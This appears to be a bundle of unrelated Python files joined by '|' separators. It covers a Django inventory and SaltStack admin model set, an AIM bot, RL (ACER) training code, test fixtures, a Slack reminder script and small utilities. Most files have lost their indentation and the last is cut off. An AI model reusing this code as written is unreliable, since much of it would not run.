manufacturer = models.CharField(max_length=20,blank=True, verbose_name=u'厂商')
productname = models.CharField(max_length=30,blank=True, verbose_name=u'产品型号')
service_tag = models.CharField(max_length=80,blank=True, unique=True, verbose_name=u'序列号')
cpu_model = models.CharField(max_length=50,blank=True,verbose_name=u'CPU型号')
cpu_nums = models.PositiveSmallIntegerField(blank=True,null=True,verbose_name=u'CPU线程数')
cpu_groups = models.PositiveSmallIntegerField(null=True,blank=True,verbose_name=u'CPU物理核数')
mem = models.CharField(max_length=100,blank=True,verbose_name=u'内存大小')
disk = models.CharField(max_length=300,blank=True,verbose_name=u'硬盘大小')
hostname = models.CharField(max_length=30,blank=True,verbose_name=u'主机名')
ip = models.GenericIPAddressField(unique=True,verbose_name=u'IP地址')
ip2 = models.GenericIPAddressField(unique=True,null=True,blank=True, verbose_name=u'其他IP地址')
os = models.CharField(max_length=20,blank=True,verbose_name=u'操作系统')
def __unicode__(self):
return self.ip
class Meta:
verbose_name = u'主机详细信息'
verbose_name_plural = u'主机详细信息列表'
class Network(models.Model):
name = models.CharField(max_length=30, verbose_name=u'名称')
brand = models.CharField(max_length=30,blank=True, verbose_name=u'品牌')
model = models.CharField(max_length=30,blank=True, verbose_name=u'型号')
ip_out = models.GenericIPAddressField(unique=True,null=True,blank=True,verbose_name=u'外网IP地址')
ip_in = models.GenericIPAddressField(unique=True,null=True,blank=True, verbose_name=u'内网IP地址')
info = models.CharField(max_length=100,blank=True, verbose_name=u'说明')
url = models.URLField(max_length=100, blank=True,verbose_name=u'访问地址')
idc_name = models.ForeignKey(IDC,verbose_name=u'所属机房')
def __unicode__(self):
return self.name
class Meta:
verbose_name = u'网络设备'
verbose_name_plural = u'网络设备列表'
# SaltStack-related functionality
class Salt_Server(models.Model):
idc = models.ForeignKey(IDC,verbose_name=u'所属机房')
ip = models.GenericIPAddressField(verbose_name=u'服务器IP')
port = models.IntegerField(verbose_name=u'端口号')
url = models.URLField(blank=True,verbose_name=u'URL地址')
username = models.CharField(max_length=20, verbose_name=u'用户名')
password = models.CharField(max_length=50,verbose_name=u'密码')
def __unicode__(self):
return self.ip
class Meta:
verbose_name = u'Salt服务器'
verbose_name_plural = u'Salt服务器列表'
#https://docs.saltstack.com/en/latest/ref/modules/all/index.html
class Salt_Module(models.Model):
name = models.CharField(unique=True,max_length=20,verbose_name=u'Salt模块')
info = models.TextField(max_length=200,verbose_name=u'模块说明')
url = models.URLField(blank=True,verbose_name=u'官网链接')
def __unicode__(self):
return self.name
class Meta:
verbose_name = u'Salt模块'
verbose_name_plural = u'Salt模块列表'
class Salt_Command(models.Model):
cmd = models.CharField(unique=True,max_length=40,verbose_name=u'Salt命令')
module = models.ForeignKey(Salt_Module,verbose_name=u'所属模块')
info = models.TextField(max_length=400,verbose_name=u'命令说明')
def __unicode__(self):
return self.cmd
class Meta:
verbose_name = u'Salt命令'
verbose_name_plural = u'Salt命令列表'
class Salt_Function(models.Model):
name = models.CharField(max_length=20,unique=True,verbose_name=u'功能名称')
cmd = models.ForeignKey(Salt_Command,verbose_name=u'Salt命令')
args = models.CharField(max_length=100,blank=True,verbose_name=u'Salt命令参数')
group = models.ManyToManyField('Group',blank=True ,verbose_name=u'所属组')
info = models.TextField(max_length=200,blank=True,verbose_name=u'功能说明')
def __unicode__(self):
return self.name
class Meta:
verbose_name = u'Salt功能'
verbose_name_plural = u'Salt功能列表'
class Salt_Flow(models.Model):
name = models.CharField(max_length=20,unique=True,verbose_name=u'流程名称')
hosts = models.CharField(max_length=100,blank=True,verbose_name=u'主机列表')
funs = models.ManyToManyField(Salt_Function,verbose_name=u'功能列表')
info = models.TextField(max_length=200,verbose_name=u'流程说明')
def __unicode__(self):
return self.name
class Meta:
verbose_name = u'Salt流程'
verbose_name_plural = u'Salt流程列表'
class Upload(models.Model):
username = models.CharField(max_length = 30,verbose_name=u'用户')
headImg = models.FileField(upload_to = './upload/',verbose_name=u'文件路径')
date = models.DateTimeField(auto_now_add=True,verbose_name=u'上传时间')
    # Stores the path where the uploaded file is saved, not the file content itself.
def __unicode__(self):
return self.headImg
class Meta:
verbose_name = u'文件上传'
verbose_name_plural = u'文件上传' |
#!/usr/local/bin/python
########################################################
#
# File: AwayBot.py
# Author: Jamie Turner <[email protected]>
# Date: 4/11/02
#
# Description:
#
# Weird little bot that sets its away message
# according to viewers' incoming IMs.
#
from toc import TocTalk
import time
class AwayBot(TocTalk):
#whenever someone IMs us
def on_IM_IN(self,data):
# get the screenname to IM back--
# and the message to set as our away
screenname = data.split(":")[0]
message = self.strip_html(":".join(data.split(":")[2:]) )
# first, clear it
self.do_SET_AWAY("")
# delay
time.sleep(2)
# thank them
self.do_SEND_IM(screenname,
"Thanks for giving me an idea for my away message!" )
# delay
time.sleep(2)
# set the away message accordingly
self.do_SET_AWAY(
'''<B>%s</B> offered this: "<I>%s</I>"''' % (screenname,message) )
# if this file is run directly
if __name__ == "__main__":
# create the bot, specify some AIM account to use
bot = AwayBot("IMscreenname", "somepass")
# Py-TOC will use this var as our info
bot._info = \
"Hi, I'm an away message bot. IM me something clever and I'll use it as my away message."
# Start it up. We never return from this
bot.go()
|
from __future__ import unicode_literals
from mopidy import backend as backend_api
from mopidy_spotify_tunigo import backend, library
class TestSpotifyTunigoBackend(object):
def get_backend(self, config):
return backend.SpotifyTunigoBackend(config=config, audio=None)
def test_uri_schemes(self, config):
backend = self.get_backend(config)
assert 'spotifytunigo' in backend.uri_schemes
def test_init_sets_up_the_providers(self, config):
backend = self.get_backend(config)
assert isinstance(
backend.library, library.SpotifyTunigoLibraryProvider)
assert isinstance(backend.library, backend_api.LibraryProvider)
|
from dqo.db.models import Table, Column, DataType, Database, ColumnStats, NumericStats
def employees_db_w_meta() -> Database:
table_employees = Table("employees",
[
Column("id", DataType.STRING, stats=ColumnStats(int(1e6), 0, int(1e6), True)),
Column("salary", DataType.NUMBER, stats=ColumnStats(int(1e6), 10, int(1e5))),
Column("dept", DataType.STRING, stats=ColumnStats(int(1e6), 100, 100)),
Column("company", DataType.STRING, stats=ColumnStats(int(1e6), 0, 3)),
Column("name", DataType.STRING, stats=ColumnStats(int(1e6), 0, int(1e5))),
Column("active", DataType.BOOL, stats=ColumnStats(int(1e6), 0, 2))
])
table_departments = Table("departments",
[
Column("id", DataType.NUMBER, stats=ColumnStats(100, 0, 100, True)),
Column("name", DataType.STRING, stats=ColumnStats(100, 0, 100))
])
table_companies = Table("companies",
[
Column("id", DataType.NUMBER, stats=ColumnStats(3, 0, 3, True)),
Column("name", DataType.STRING, stats=ColumnStats(3, 0, 3))
])
return Database([
table_employees,
table_departments,
table_companies
])
def employees2_db_w_meta() -> Database:
table_employees = Table("employees",
[
Column("id", DataType.STRING, stats=ColumnStats(int(1e6), 0, int(1e6), True)),
Column("salary", DataType.FLOAT,
stats=ColumnStats(
total=int(1e6), nulls=10, distinct=int(1e5),
values=NumericStats(min=1.0, max=100.0, mean=50, variance=0.1, skewness=0.1, kurtosis=0.1, freq=[],
hist=[])
)),
Column("date", DataType.TIME,
stats=ColumnStats(
total=int(1e6), nulls=10, distinct=int(1e5),
values=NumericStats(
min=1279568347, max=1410661888, mean=50, variance=0.1, skewness=0.1, kurtosis=0.1,
freq=[],
hist=[])
)),
])
table_departments = Table("departments",
[
Column("id", DataType.NUMBER, stats=ColumnStats(100, 0, 100, True)),
Column("name", DataType.STRING, stats=ColumnStats(100, 0, 100))
])
table_companies = Table("companies",
[
Column("id", DataType.NUMBER, stats=ColumnStats(3, 0, 3, True)),
Column("name", DataType.STRING, stats=ColumnStats(3, 0, 3))
])
return Database([
table_employees,
table_departments,
table_companies
])
def imdb_db_w_meta() -> Database:
aka_name = Table("aka_name",
[
Column("id", DataType.NUMBER, stats=ColumnStats(int(1e6), 0, int(1e6), True)),
Column("person_id", DataType.NUMBER, stats=ColumnStats(int(1e6), 0, int(1e6), True)),
Column("imdb_index", DataType.STRING, stats=ColumnStats(int(1e6), 10, int(1e5))),
Column("surname_pcode", DataType.STRING, stats=ColumnStats(int(1e6), 0, int(1e5)))
])
comp_cast_type = Table("comp_cast_type",
[
Column("id", DataType.NUMBER, stats=ColumnStats(int(1e6), 0, int(1e6), True)),
Column("name", DataType.STRING, stats=ColumnStats(100, 0, 100))
])
company_name = Table("company_name",
[
Column("id", DataType.NUMBER, stats=ColumnStats(int(1e6), 0, int(1e6), True)),
Column("md5sum", DataType.STRING, stats=ColumnStats(3, 0, 3)),
Column("name", DataType.STRING, stats=ColumnStats(3, 0, 3))
])
info_type = Table("info_type",
[
Column("id", DataType.NUMBER, stats=ColumnStats(int(1e6), 0, int(1e6), True)),
Column("name", DataType.STRING, stats=ColumnStats(3, 0, 3)),
Column("info", DataType.STRING, stats=ColumnStats(3, 0, 3)),
])
keyword = Table("keyword",
[
Column("id", DataType.NUMBER, stats=ColumnStats(int(1e6), 0, int(1e6), True)),
Column("name", DataType.STRING, stats=ColumnStats(3, 0, 3)),
Column("phonetic_code", DataType.STRING, stats=ColumnStats(3, 0, 3))
])
movie_info = Table("movie_info",
[
Column("id", DataType.NUMBER, stats=ColumnStats(int(1e6), 0, int(1e6), True)),
Column("name", DataType.STRING, stats=ColumnStats(3, 0, 3)),
Column("movie_id", DataType.NUMBER, stats=ColumnStats(3, 0, 3))
])
movie_info_idx = Table("movie_info_idx",
[
Column("id", DataType.NUMBER, stats=ColumnStats(int(1e6), 0, int(1e6), True)),
Column("name", DataType.STRING, stats=ColumnStats(3, 0, 3)),
Column("info_type_id", DataType.NUMBER, stats=ColumnStats(int(1e6), 0, int(1e6), True)),
])
movie_keyword = Table("movie_keyword",
[
Column("id", DataType.NUMBER, stats=ColumnStats(int(1e6), 0, int(1e6), True)),
Column("name", DataType.STRING, stats=ColumnStats(3, 0, 3)),
Column("movie_id", DataType.NUMBER, stats=ColumnStats(3, 0, 3))
])
movie_link = Table("movie_link",
[
Column("id", DataType.NUMBER, stats=ColumnStats(int(1e6), 0, int(1e6), True)),
Column("linked_movie_id", DataType.NUMBER, stats=ColumnStats(3, 0, 3)),
Column("movie_id", DataType.NUMBER, stats=ColumnStats(3, 0, 3))
])
role_type = Table("role_type",
[
Column("id", DataType.NUMBER, stats=ColumnStats(int(1e6), 0, int(1e6), True)),
Column("name", DataType.STRING, stats=ColumnStats(3, 0, 3))
])
return Database([
aka_name,
comp_cast_type,
company_name,
movie_info,
movie_info_idx,
movie_keyword,
movie_link,
role_type,
info_type,
keyword
])
|
import time
from torch.distributions import Categorical
import torch
from torch import nn
import copy
import gym
import numpy as np
from collections import deque
import pytorch_drl.utils.model_utils as model_utils
from pytorch_drl.algs.base import Agent
from pytorch_drl.utils.memory.buffer import EpisodicBuffer
from pytorch_drl.utils.shared_optim import AdamShared
import torch.multiprocessing as mp
class ACER_Agent(mp.Process):
def __init__(self,
network=None,
average_model=None,
queue=None,
net_constr=None,
net_args=None,
env_name=None,
env_constr=None,
env_args=None,
gamma=0.99,
replay_n=4,
lr=None,
n_env=8,
normalize_rewards=False,
polyak_alpha=0.99,
trpo_theta=1,
use_trpo=True,
entropy_coefficient=1e-4,
memory_size_steps=100_000,
max_episodes=1_000,
max_episode_length=200,
max_traj_length=100,
start_off_policy=2000,
clip=10,
batch_size=16,
max_grad_norm=None,
seed=0,
mp_id=-1,
optimizer=None
):
super().__init__()
self.max_episodes = max_episodes
self.net_constr = net_constr
self.trpo_theta = trpo_theta
self.clip = clip
self.net_args = net_args
self.env_name = env_name
self.max_traj_length = max_traj_length
self.gamma = gamma
self.polyak_alpha = polyak_alpha
self.replay_n = replay_n
self.lr = lr
self.entropy_coefficient = entropy_coefficient
self.device = "cpu"
self.normalize_rewards = normalize_rewards
self.use_trpo = use_trpo
self.max_grad_norm = max_grad_norm
self.queue = queue
self.n_env = n_env
self.mp_id = mp_id
self.shared_model = network
self.average_model = average_model
self.max_episode_length = max_episode_length
self.start_off_policy = start_off_policy
self.n_eps = 1e-10 # epsilon for log, div
self.model = copy.deepcopy(self.shared_model)
self.optimizer = optimizer
memory_size = memory_size_steps // max_traj_length // n_env
self.buffer = EpisodicBuffer(memory_size, seed,
self.device, batch_size)
self.env = env_constr(*env_args)
self.state = self.env.reset()
self.episode_t = 0
self.episode_score = 0
# Collects an episode and returns
# the data in the same format as buffer.sample
def collect_episode(self):
states, actions, rewards, policies, dones = [], [], [], [], []
for i in range(self.max_traj_length-1):
self.episode_t += 1
state_th = torch.from_numpy(self.state)\
.float().unsqueeze(0).to(self.device)
policy, q_value = self.model(state_th)
action = Categorical(policy).sample().item()
next_state, reward, done, _ = self.env.step(action)
done = done or (self.episode_t > self.max_episode_length)
states.append(self.state)
actions.append(action)
rewards.append(reward)
dones.append(done)
policies.append(policy.squeeze(0).detach().cpu().numpy())
self.state = next_state
self.episode_score += reward
if done or self.episode_t > self.max_episode_length:
self.episode_t = 0
self.state = self.env.reset()
self.queue.put(self.episode_score)
self.episode_score = 0
states.append(self.state)
episode = [states, actions, rewards, policies, dones]
return self.buffer.add(episode)
def learn(self, offline=True):
self.model.load_state_dict(self.shared_model.state_dict())
eps = self.n_eps
if offline:
batch = self.buffer.sample()
else:
batch = self.collect_episode()
states, actions, rewards, b_policies, dones = batch
policies, q_values, avg_policies = [], [], []
# =================== COLLECT DATA =============================
k = states.shape[0]
for i in range(k):
state = states[i]
policy, q_value = self.model(state)
avg_policy, _ = self.average_model(state)
avg_policy.detach_()
policies.append(policy)
q_values.append(q_value)
avg_policies.append(avg_policy)
policies = torch.stack(policies)
q_values = torch.stack(q_values)
avg_policies = torch.stack(avg_policies)
# ========================= LEARN ==============================
value = (policies[k-1] * q_values[k-1])\
.sum(-1, keepdims=True).detach()
q_ret = value
loss = 0
for t in reversed(range(k-1)):
value = (policies[t]
* q_values[t]).sum(-1, keepdims=True).detach()
q_ret = rewards[t] + self.gamma * q_ret * (1-dones[t])
ratio = (policies[t] / (b_policies[t]+eps)).detach()
correction_constant = ((1 - self.clip/(ratio+eps)).clamp(min=0)
* policies[t]).detach()
policy_log = (policies[t]+eps).log()
delta = q_ret - q_values[t].gather(1, actions[t])
policy_loss = -(ratio.gather(1, actions[t]).clamp(max=self.clip)
* policy_log.gather(1, actions[t])
* (q_ret - value)
).mean()
policy_loss += -(correction_constant
* policy_log
* (q_values[t].detach() - value)).sum(-1).mean()
critic_loss = ((delta).pow(2) / 2).mean()
# ========================= TRPO ===========================
if self.use_trpo:
k_grad = (avg_policies[t] / (policies[t]+eps)).detach()
gradient = -torch.autograd.grad(inputs=policies,
outputs=policy_loss,
retain_graph=True)[0][t]
k_dot_g = (k_grad * gradient).sum(-1).mean()
k_dot_k = (k_grad * k_grad).sum(-1).mean()
# the vector that will be subtracted from the gradient
grad_offset_norm = ((k_dot_g - self.trpo_theta)
/ k_dot_k).clamp(min=0)
# kl divergence
kl_div = (avg_policies[t]
* ((avg_policies[t] + eps).log()
- (policies[t] + eps).log())).sum(-1).mean()
policy_trpo_loss = (grad_offset_norm * kl_div)
policy_loss += policy_trpo_loss
# ==========================================================
entropy_loss = -(Categorical(policies[t]).entropy()
* self.entropy_coefficient).mean()
loss += (critic_loss + policy_loss + entropy_loss)
q_ret = (ratio.gather(1, actions[t]).clamp(max=1)
* (delta).detach()
+ value
)
# update average model and shared model,
self.optimizer.zero_grad()
loss.backward()
if self.max_grad_norm is not None:
torch.nn.utils.clip_grad_norm_(self.model.parameters(),
self.max_grad_norm)
model_utils.transfer_gradients(self.model, self.shared_model)
self.optimizer.step()
model_utils.soft_update_model(self.shared_model, self.average_model,
1 - self.polyak_alpha)
# runs in parallel
def run(self):
for i in range(self.max_episodes):
self.learn(offline=False)
if i < self.start_off_policy:
continue
n = int(np.random.exponential(self.replay_n))
for e in range(n):
self.learn()
self.queue.put("done")
self.env.close()
class ACER:
def __init__(self, *args, **kwargs):
if "env_constr" not in kwargs or "env_name" not in kwargs:
print("Environment is required")
raise ValueError
network = kwargs["network"]
self.shared_model = network
self.average_model = copy.deepcopy(self.shared_model)
self.shared_model.share_memory()
self.average_model.share_memory()
self.queue = mp.Queue()
lr = kwargs["lr"] if "lr" in kwargs else 1e-3
self.optimizer = AdamShared(self.shared_model.parameters(), lr=lr)
self.n_env = kwargs["n_env"]
self.args = args
self.kwargs = kwargs
self.kwargs["average_model"] = self.average_model
self.kwargs["queue"] = self.queue
self.kwargs["optimizer"] = self.optimizer
self.env_constr = kwargs["env_constr"]
self.env_args = kwargs["env_args"]
def train(self, max_score, alg_name="acer", tmax=200):
agents = [ACER_Agent(*self.args, **self.kwargs, mp_id=i)\
for i in range(self.n_env)]
[agent.start() for agent in agents]
scores = []
last_scores = deque(maxlen=max(100, self.n_env*25))
done = 0
i = 0
while True:
msg = self.queue.get()
if msg != "done": # msg is score
i += 1
scores.append(msg)
last_scores.append(msg)
avg_score = np.mean(last_scores)
print("\rScore: ", msg, end="")
if avg_score >= max_score:
print("\nSolved!")
[agent.terminate() for agent in agents]
break
else:
done += 1
if done == self.n_env:
break
[agent.join() for agent in agents]
"""
Save the model
"""
fname = "checkpoints/{}.pth".format(alg_name)
torch.save(self.shared_model.state_dict(), fname)
return scores
def act(self, state, deterministic=False):
state = torch.from_numpy(state).float().unsqueeze(0)
policy, q_value = self.shared_model(state)
if deterministic:
action = policy.argmax(-1).item()
else:
action = Categorical(policy).sample().item()
return action
def test(self, n_episodes, max_t, render=True, deterministic=False):
# test
env = self.env_constr(*self.env_args)
for i in range(n_episodes):
score = 0
state = env.reset()
for i in range(max_t):
action = self.act(state, deterministic)
state, reward, done, _ = env.step(action)
if render:
env.render()
score += reward
if done:
break
print(score)
env.close()
def save(self, fname):
torch.save({"actor_critic_sd": self.shared_model.state_dict()}, fname)
def load(self, fname):
dat = torch.load(fname)
self.shared_model.load_state_dict(dat["actor_critic_sd"])
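# Illustrative sketch (not part of the original module): wiring ACER up to a
# gym environment. `ActorCritic` is a hypothetical network (an assumption,
# not part of this file) returning a softmax policy and per-action Q-values,
# which is the contract ACER_Agent expects from its model.
if __name__ == '__main__':
    class ActorCritic(nn.Module):
        def __init__(self, obs_size, n_actions):
            super().__init__()
            self.body = nn.Sequential(nn.Linear(obs_size, 64), nn.ReLU())
            self.pi = nn.Linear(64, n_actions)
            self.q = nn.Linear(64, n_actions)

        def forward(self, x):
            h = self.body(x)
            return torch.softmax(self.pi(h), dim=-1), self.q(h)

    agent = ACER(network=ActorCritic(4, 2),
                 env_constr=gym.make, env_args=["CartPole-v1"],
                 env_name="CartPole-v1", n_env=2, lr=7e-4)
    # agent.train(max_score=195.0) would spawn the worker processes.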
|
import os
os.system("python 1_search_standard_box_spacer_0_16_greedy.py")
os.system("python 2_search_specific_box_spacer_0_16_greedy.py")
os.system("python 3_search_Epsilonproteobacteria_box_spacer_0_16_greedy.py")
os.system("python 4_concat_delete_repeat.py")
os.system("python 5_box1_box2.py")
os.system("python 6_search_upstream_box.py")
os.system("python 7_adjust_box.py")
os.system("python 8_calculate_spacer_len.py")
os.system("python 9_adjust_box_mismatch.py")
os.system("python 10_minmismatch_newspacer.py")
os.system("python 11_score_trio.py")
os.system("python 12_screen.py")
os.system("python 14_connect_seq.py")
|
import torch
from constant.readFile import getPredictData
from constant.constPath import modelPath, predictSize
def startPredict():
data = getPredictData()
l = data.shape[1]
net = torch.load(modelPath)
test_in = torch.from_numpy(data[:predictSize, :l - 1]).float()
test_out = net(test_in)
id = data[:predictSize, l - 1]
label = test_out.max(-1)[1]
# for i in range(predictSize):
# print(int(id[i]), int(lab[i]))
return id, label
|
#encoding:utf-8
import torch
import numpy as np
from ..common.tools import model_device, parse_idx
from ..callback.progressbar import ProgressBar
from pybert.train.metrics import MRR, Recall, NDCG, EIM, REIM, RIIM
from pybert.configs.basic_config import config
class Predictor(object):
def __init__(self,
model,
logger,
n_gpu,
i2w,
i2l
):
self.model = model
self.logger = logger
self.model, self.device = model_device(n_gpu= n_gpu, model=self.model)
self.i2w = i2w
self.i2l = i2l
def predict(self,data):
pbar = ProgressBar(n_total=len(data))
all_logits = None
self.model.eval()
test_metrics = [MRR(), NDCG(), Recall(), EIM(config['data_label_path'],self.i2w,self.i2l), RIIM(config['data_label_path'],self.i2w,self.i2l), REIM(config['data_label_path'],self.i2w,self.i2l)]
implicit_metrics = ["eim","riim","reim"]
with torch.no_grad():
for step, batch in enumerate(data):
batch = tuple(t.to(self.device) for t in batch)
input_ids, input_mask, segment_ids, label_ids = batch
logits = self.model(input_ids, segment_ids, input_mask)
for metric in test_metrics:
if metric.name() in implicit_metrics:
metric(input_ids=input_ids, output=logits, target=label_ids)
else:
metric(logits=logits, target=label_ids)
logits = logits.sigmoid()
if all_logits is None:
all_logits = logits.detach().cpu().numpy()
else:
all_logits = np.concatenate([all_logits,logits.detach().cpu().numpy()],axis = 0)
pbar.batch_step(step=step,info = {},bar_type='Testing')
for metric in test_metrics:
metric.show()
if 'cuda' in str(self.device):
torch.cuda.empty_cache()
return all_logits
def job_labels(self, label_indices):
labels = []
for idx in label_indices:
labels.append(self.i2l[idx])
return labels
def print_labels(self,logits,idx):
sorted_prediction_indices = np.flip(np.argsort(logits[idx]))
sorted_prediction_indices = sorted_prediction_indices[:20]
predicted_labels = self.job_labels(sorted_prediction_indices)
print("prediction {}: {}".format(idx,predicted_labels))
def labels(self,logits,idx):
idx = parse_idx(idx,logits.shape[0])
print("-"*89)
print("printing labels")
for i in idx:
self.print_labels(logits,i) |
#!/usr/bin/python
import yaml
import requests
import csv
import sys
import json
from datetime import datetime, timedelta
from os.path import expanduser
import time
config_file = expanduser("~") + "/.datereminder/config.yml"
print config_file
mmdd = datetime.now().strftime("%m-%d")
yyyy = datetime.now().strftime("%Y")
yyyymmdd = datetime.now().strftime("%Y-%m-%d")
todayObj = datetime.strptime(yyyymmdd, "%Y-%m-%d")
try:
config = yaml.safe_load(open(config_file))
except:
print "Unable to read config file."
sys.exit(0)
def slack(chan, text):
payload = {
"text": text,
"channel": chan,
"icon_emoji": config['icon_emoji'],
"username": config['username']
}
slackr = requests.post(config['webhook'], data=json.dumps(payload))
print "Slack response:", slackr.text
time.sleep(1)
def is_valid_year(year):
if year and year.isdigit():
if int(year) >= 1900 and int(year) <= 2100:
return True
return False
csv_r = requests.get(config['downloadurl'])
if csv_r.status_code != 200:
    print "Unable to fetch spreadsheet. Not a 200 status code."
sys.exit(0)
ss = list(csv.reader(csv_r.text.split('\n')))
header = ss[0]
headerN = {}
for cellN in range(0, len(header)):
headerN[header[cellN].strip().lower()] = cellN
for row in ss[1:]:
record = {}
for n in range(0, len(row)):
for hcol in headerN.keys():
if headerN[hcol] == n:
if row[n].strip() != '':
record[hcol] = row[n]
if all(col in record.keys()
for col in ['mm-dd', 'type', 'channel', 'days prior', 'text']):
#print "Valid Record", record
rec_date_obj = datetime.strptime(yyyy + "-" + record['mm-dd'],
"%Y-%m-%d")
if 'year' in record.keys() and is_valid_year(record['year']):
rec_alert_date_obj = datetime.strptime(
record['year'] + "-" + record['mm-dd'],
"%Y-%m-%d") - timedelta(days=int(record['days prior']))
else:
rec_alert_date_obj = datetime.strptime(
yyyy + "-" + record['mm-dd'],
"%Y-%m-%d") - timedelta(days=int(record['days prior']))
if todayObj >= rec_alert_date_obj and todayObj <= rec_date_obj:
days = (rec_date_obj - todayObj).days
daystext = " in " + str(days) + " day"
if days > 1:
daystext += "s"
elif days == 0:
daystext = " today"
if record['type'].lower().strip() == 'birthday':
text = ':birthday: ' + record['text'] + " has a birthday" + daystext + " on " + record['mm-dd']
elif record['type'].lower().strip() == 'work anniversary':
text = ':partyparrot: ' + record['text'] + " has a work anniversary" + daystext + " on " + record['mm-dd']
else:
text = record['text'] + daystext + " on " + record['mm-dd']
print record['channel'], text
slack(record['channel'], text)
|
print("How old are you?", end=' ')
# end=' ' tells print not to end the line with a newline character
age = input()
print("How tall are you?", end=' ')
height = input()
print("How much do you weigh?", end=' ')
weight = input()
print(f"So, you're {age} years old, {height}cm tall and {weight}kg heavy.")
|
'''Functions to diff a local subtree with its remote.'''
import click
import requests
def repo_commits_since(repo, since_ref, headers):
if since_ref:
compare_url = repo['compare_url'].format(base=since_ref, head='master')
compare_resp = requests.get(compare_url, headers=headers)
compare_resp.raise_for_status()
return compare_resp.json()
else:
commits = []
all_commits_url = repo['commits_url'].format(**{'/sha': ''})
next_commits_url = all_commits_url + '?per_page=100'
while next_commits_url:
commits_resp = requests.get(next_commits_url, headers=headers)
commits_resp.raise_for_status()
commits.extend(commits_resp.json())
next_commits_url = (commits_resp.links.get('next') or {}).get('url')
return {
'status': 'ahead',
'ahead_by': len(commits),
'commits': commits,
}
def tags_in_commits(repo, commits, headers):
tags_resp = requests.get(repo['tags_url'], headers=headers)
tags_resp.raise_for_status()
commits_by_sha = {commit['sha']: commit for commit in commits}
return [tag for tag in tags_resp.json() if tag['commit']['sha'] in commits_by_sha]
def print_diverged(remote):
click.echo('{} is diverged from {}.'.format(
remote.subtree.prefix,
remote.repo['html_url'],
))
def print_subtree_diff(subtree_remotes):
'''Prints a summary diff of subtree remotes that are ahead.'''
if len(subtree_remotes) == 1 and not subtree_remotes[0].is_ahead:
print_up_to_date(subtree_remotes[0])
return
max_prefix_len = max(len(remote.subtree.prefix) for remote in subtree_remotes) + 3
max_repo_len = max(len(remote.repo['html_url']) for remote in subtree_remotes) + 3
row_format = '{:<' + str(max_prefix_len) + '}{:<' + str(max_repo_len) + '}{:<15}{:<30}'
    click.secho(row_format.format('Prefix', 'Remote', 'Ahead By', 'Tags Since'), underline=True)
for remote in subtree_remotes:
if not remote.subtree.exists:
ahead_by = '(new)'
elif remote.is_diverged:
ahead_by = '(diverged)'
elif remote.commits_since['ahead_by']:
ahead_by = remote.commits_since['ahead_by']
else:
ahead_by = '(up-to-date)'
click.secho(row_format.format(
remote.subtree.prefix,
remote.repo['html_url'],
ahead_by,
', '.join(sorted(tag['name'] for tag in remote.tags_since)) or '(none)',
))
def print_up_to_date(remote):
click.echo('{} already up-to-date with {}.'.format(
remote.subtree.prefix,
remote.repo['html_url'],
))
|
import os
import os.path
import hashlib
from os.path import join as pjoin
def download_file(source, target):
return 'wget %s -O %s' % (source, target)
def get_file_list(base_path, include_list = None, exclude_list = None):
if not isinstance(include_list, (list, tuple)):
include_list = [ include_list ]
if not exclude_list:
exclude_list = []
def is_included(file_path):
for path in include_list:
if file_path.find(path) == 0:
return True
return False
def is_excluded(file_path):
for path in exclude_list:
if file_path.find(path) == 0:
return True
return False
files = []
for (dirpath, dirname, filenames) in os.walk(base_path):
for file_name in filenames:
file_path = pjoin(dirpath.replace('%s/' % (base_path), ''), file_name)
if is_included(file_path) and not is_excluded(file_path):
files.append(file_path)
return files
def file_sum(file_path, hash_type='md5'):
    if hash_type not in [ 'sha1', 'md5' ]:
        raise ValueError('Invalid hash type: %s' % (hash_type))
    file_hash = getattr(hashlib, hash_type)()
    with open(file_path, 'rb') as fp:
        content = fp.read()
        file_hash.update(content)
    return file_hash.hexdigest()
def get_tar_bin_path(where_is_func, possible_names=None):
if not possible_names:
possible_names = [ 'gnutar', 'gtar', 'tar' ]
for binary in possible_names:
binary_path = where_is_func(binary)
if binary_path:
return binary_path
return None
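# Illustrative sketch (not part of the original module): exercising the
# helpers above with a stubbed `where_is_func`; the paths are assumptions.
if __name__ == '__main__':
    print(download_file('http://example.com/pkg.tar.gz', '/tmp/pkg.tar.gz'))

    def fake_where_is(name):
        return '/usr/bin/tar' if name == 'tar' else None

    print(get_tar_bin_path(fake_where_is))  # expected: /usr/bin/tar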
|
import mock
import pytest
import unittest2
@pytest.mark.funnel
class FunnelTests(unittest2.TestCase):
def _get_class(self):
from kardboard.services.funnel import Funnel
return Funnel
def test_funnel_state(self):
config = {
'Build to OTIS': {
}
}
f = self._get_class()('Build to OTIS', config['Build to OTIS'])
assert f.state == "Build to OTIS"
def test_funnel_throughput(self):
config = {
'Build to OTIS': {
'throughput': 2,
}
}
f = self._get_class()('Build to OTIS', config['Build to OTIS'])
assert 2 == f.throughput
def test_funnel_no_throughput(self):
config = {
'Build to OTIS': {
}
}
f = self._get_class()('Build to OTIS', config['Build to OTIS'])
assert f.throughput is None
def test_funnel_auth_none(self):
config = {
'Build to OTIS': {
}
}
f = self._get_class()('Build to OTIS', config['Build to OTIS'])
assert f.is_authorized('joe') is True
    def test_funnel_auth_true(self):
config = {
'Build to OTIS': {
'auth': ['joe', 'jane']
}
}
f = self._get_class()('Build to OTIS', config['Build to OTIS'])
assert f.is_authorized('joe') is True
def test_funnel_auth_false(self):
config = {
'Build to OTIS': {
'auth': ['joe', 'jane']
}
}
f = self._get_class()('Build to OTIS', config['Build to OTIS'])
assert f.is_authorized('jack') is False
def test_find_cards(self):
with mock.patch('kardboard.services.funnel.Kard') as mock_Kard:
f = self._get_class()('Build to OTIS', {})
mock_Kard.objects.filter.return_value.exclude.return_value = []
result = f.find_cards()
mock_Kard.objects.filter.assert_called_with(
state="Build to OTIS",
)
mock_Kard.objects.filter.return_value.exclude.assert_called_with(
'_ticket_system_data',
)
assert result == []
def test_state_duration(self):
with mock.patch('kardboard.services.funnel.StateLog') as mock_StateLog:
f = self._get_class()('Build to OTIS', {})
card = mock.Mock()
fake_statelog = mock.Mock()
fake_statelog.duration = 20
mock_StateLog.objects.filter.return_value.order_by.return_value = [fake_statelog, ]
duration = f.state_duration(card)
mock_StateLog.objects.filter.assert_called_with(
card=card,
state=f.state
)
mock_StateLog.objects.filter.return_value.order_by.assert_called_with(
'-entered',
)
assert 20 == duration
|
#!/usr/bin/python3
"""
Copyright 2018-2019 Firmin.Sun ([email protected])
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
